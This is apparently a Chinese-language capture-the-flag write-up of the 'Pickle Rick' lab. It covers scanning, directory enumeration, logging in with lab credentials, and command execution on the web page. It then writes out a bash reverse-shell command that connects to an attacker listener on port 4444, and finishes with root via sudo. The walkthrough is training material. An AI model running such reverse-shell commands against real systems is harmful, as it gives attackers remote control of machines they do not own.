easy难度,  Linux提权,  WriteUp,  靶场

Pickle Rick WriteUP

渗透过程

首先,扫描目标主机地址,看开放了哪些端口: image.png image.png

可以看到开放了22和80两个端口,访问80端口: image.png 注意标粗的信息,有可能是密码,查看网页源代码: image.png 发现username,但没有找到登录界面,进行目录扫描: image.png 发现/assests目录,访问该目录: image.png

发现有两张gif图和两张jpg图片,将图片下载下来后查看有无隐写信息,经过binwalk和steghide查看没有有用信息,此时nmap 漏洞扫描结果发现/login.php目录和robots.txt文件: image.png image.png

访问robots.txt文件:

image.png

访问后发现是Wubbalubbadubdub。 访问/login.php目录: image.png

将收集到的用户名写上,BURRRP、BURRRRRRRRP、Wubbalubbadubdub作为密码依次尝试,最后得到用户名为R1ckRul3s,密码为Wubbalubbadubdub。登录到页面内: image.png

经查看后只有此页面也可以访问,且能进行命令执行: image.png

将反弹shell直接写入/tmp目录,在kali的4444端口起监听: image.png

echo 'bash -i >& /dev/tcp/10.9.141.149/4444 0>&1' > /tmp/shell.sh && chmod 777 /tmp/shell.sh && ls -l /tmp/

image.png

反弹shell成功:

image.png

查看sudo -l权限,看能否提权: image.png

发现有sodo所有权限,直接sudo su提权为root:

image.png

查看三个flag结束渗透。